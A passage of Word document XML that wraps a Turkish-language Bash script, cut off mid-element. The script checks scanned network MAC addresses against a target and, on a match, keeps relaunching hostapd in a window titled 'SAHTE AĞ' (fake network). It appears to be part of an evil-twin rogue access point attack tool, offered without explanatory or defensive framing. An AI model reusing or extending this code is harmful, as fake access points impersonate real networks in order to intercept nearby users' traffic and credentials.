    <w:p w14:paraId="200CE335" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>k=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29751F8D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0D484003" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>for maci in ${calisilanag[@]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC7A20" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6A75D897" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4603172F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7F9D495A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5013F562" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B99BD3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="739BC4B7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="39D6A33B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>###################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A40E6EC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="26E7D96E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>k=$(($k+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D27CE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6D3CD151" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if [ "$k" = "1" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5136F534" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4469B192" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CDF42D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D166C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>duru=$maci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2104B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3067C5AB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$k" = "2" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18170259" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="45C1BFE9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC3499" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="64AA9B16" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>duru2=$maci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C7C1A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7A01B481" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$k" = "3" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E76A882" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="192B5D38" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA3E697" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3DD20001" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>duru3=$maci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56F557" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6F0ECF50" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$k" = "4" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26341F8F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="38AB6F37" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D668A6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="73796FB5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>duru4=$maci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF76EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="10424BD3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$k" = "5" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A639C71" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3A757D22" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E5246" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7FB727DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>duru5=$maci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30811A5C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="63DD0393" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="30DF1B89" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7A301748" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="21FA0E0F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FA1451" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="64EA2A1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="065E6757" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#####################################3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF2F0C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="51ACD346" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6E31FE44" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0EF46EBE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52492233" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB1DAB0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       if  [ "$duru" = "$Host_MAC," ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F7BCF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="76DDA749" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30679BB9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="11CDD9F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "AĞ AÇIK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F4600" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D381B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E2FF1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1B01D2A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAD038" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4412CABC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                         if [ "$f" = "hostapd" ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF878B3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1A3B1BCF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                         then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A69130" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="591CD918" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                         echo "YAYINA DEVAM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C154D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0DDFD3BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                         else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECA85CC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                         echo "YENİDEN YAYINA BAŞLANDI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7BCD49" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1A7F2BC2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                          xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBE7AD5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="757B108C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                         fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36BC87" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="07EB4FA7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="695B6D84" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>########</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73855577" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5D2CA160" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">        f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437D67D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">        duru=" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C417E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="65D94E92" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">        elif  [ "$duru2" = "$Host_MAC," ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA82209" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="392E9BCC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">        then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1BA37F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5B5C166D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">        echo "AĞ AÇIK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D544E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6EC0AAE1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706861A9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6F778E32" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58971377" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D2AD73" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4B54D9DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                       if [ "$f" = "hostapd" ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1136B8E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7B5FF936" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                       then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE88C85" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1363A68E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                       echo "YAYINA DEVAM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F96010" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="29E734C8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                       else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0B6F2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="38D73709" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                       echo "YENİDEN YAYINA BAŞLANDI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336714EF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="149AE54D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                       xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B7199" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7021BE04" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                       fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59838B93" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="268E6470" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>##########</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAFF4F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5C550D6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1182A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         duru2=" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38EFFA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1C5B392B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         elif  [ "$duru3" = "$Host_MAC," ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACD6F2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6BBF082F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA9E019" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0206DDA7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         echo "AĞ AÇIK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C71F67B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1B09A9F9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA8567" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="606CB95A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#######</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F91FA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E600D51" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      if [ "$f" = "hostapd" ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBD30A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="630BEEB6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1B247" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="16B138CB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      echo "YAYINA DEVAM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC85E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5209FE08" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64635032" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      echo "YENİDEN YAYINA BAŞLANDI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51087F74" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4E0E778E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D6A70" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="49B91B16" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                      fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50F102" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="053AC7A6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#####333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B09F0B0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          f=`ps -A 2&gt;&amp;1 | grep hostapd | awk '{print $4}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763716C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          duru3=" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D02FBC7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4681B5F8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EB92A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">          elif  [ "$duru4" = "$Host_MAC," ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10828ACE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7B13AEC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D247C4E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3BC193C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         echo "AĞ AÇIK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F1229" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="507872B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D54BFE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
